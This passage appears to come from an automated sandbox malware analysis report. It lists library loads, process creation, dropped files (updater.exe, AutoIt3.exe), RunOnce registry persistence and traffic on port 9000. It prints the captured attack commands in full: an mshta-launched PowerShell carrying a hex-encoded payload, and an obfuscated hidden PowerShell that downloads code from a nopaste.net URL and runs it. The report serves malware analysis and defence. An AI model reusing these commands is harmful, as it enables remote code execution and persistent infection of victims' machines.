                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: wsock32.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: version.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: winmm.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: mpr.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: wininet.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: iphlpapi.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: userenv.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: uxtheme.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: wsock32.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: version.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: winmm.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: mpr.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: wininet.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: iphlpapi.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: userenv.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: uxtheme.dll
                    Source: C:\faggbgb\AutoIt3.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: l\System.pdbuPH source: powershell.exe, 00000002.00000002.2558487594.00000000072C0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: updater.exe, 0000000E.00000002.1759708185.0000000005DE4000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753158780.0000000005D69000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753523111.0000000005C48000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1897124918.00000000054C8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896985871.00000000055E9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903281619.0000000005664000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1972191350.0000000005688000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978320998.0000000005824000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971927770.00000000057A9000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: updater.exe, 0000000E.00000002.1759708185.0000000005DE4000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753158780.0000000005D69000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753523111.0000000005C48000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1897124918.00000000054C8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896985871.00000000055E9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903281619.0000000005664000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1972191350.0000000005688000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978320998.0000000005824000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971927770.00000000057A9000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: em.pdb source: powershell.exe, 00000002.00000002.2565317637.0000000008321000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: em.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.2565317637.0000000008321000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2530957813.0000000000D78000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0103C6D9 LoadLibraryA,GetProcAddress,14_2_0103C6D9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_046F27FF push esp; ret 2_2_046F2849
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_046F4960 push 08081351h; ret 2_2_046F4A55
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_046F4A48 push 08081351h; ret 2_2_046F4A55
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_046F11CD pushfd ; iretd 2_2_046F11D2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_007720C5 push edi; ret 4_2_007720F2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00770DBD pushfd ; iretd 4_2_00770DC2
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FE8B75 push ecx; ret 14_2_00FE8B88
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_016081F1 push 0160821Dh; ret 14_2_01608215
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01606069 push 01606095h; ret 14_2_0160608D
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01609069 push 01609095h; ret 14_2_0160908D
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01606031 push 0160605Dh; ret 14_2_01606055
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_016060F9 push 01606125h; ret 14_2_0160611D
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_016060D9 push 01606125h; ret 14_2_0160611D
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_016060A1 push 016060CDh; ret 14_2_016060C5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_015F408D push 015F40B9h; ret 14_2_015F40B1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_015FA3DF push 015FA450h; ret 14_2_015FA448
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_015FA3E1 push 015FA450h; ret 14_2_015FA448
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_016023A1 push ecx; mov dword ptr [esp], ecx14_2_016023A6
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_015FA261 push 015FA3DDh; ret 14_2_015FA3D5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_016092B1 push 016092FDh; ret 14_2_016092F5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_016052BD push 016052E9h; ret 14_2_016052E1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01600529 push 0160059Fh; ret 14_2_01600597
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_016005A1 push 01600649h; ret 14_2_01600641
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_015FA459 push 015FA48Dh; ret 14_2_015FA485
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0160A47D push 0160A4A9h; ret 14_2_0160A4A1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0160A445 push 0160A471h; ret 14_2_0160A469
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_015FA461 push 015FA48Dh; ret 14_2_015FA485
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0160A4BB push 0160A4E9h; ret 14_2_0160A4E1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0160A4BD push 0160A4E9h; ret 14_2_0160A4E1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0160470B push 01604739h; ret 14_2_01604731
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0160470D push 01604739h; ret 14_2_01604731
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\33260509\updater.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeFile created: C:\faggbgb\AutoIt3.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ggkfcbc
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ggkfcbc
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ggkfcbc
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ggkfcbc

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 9000
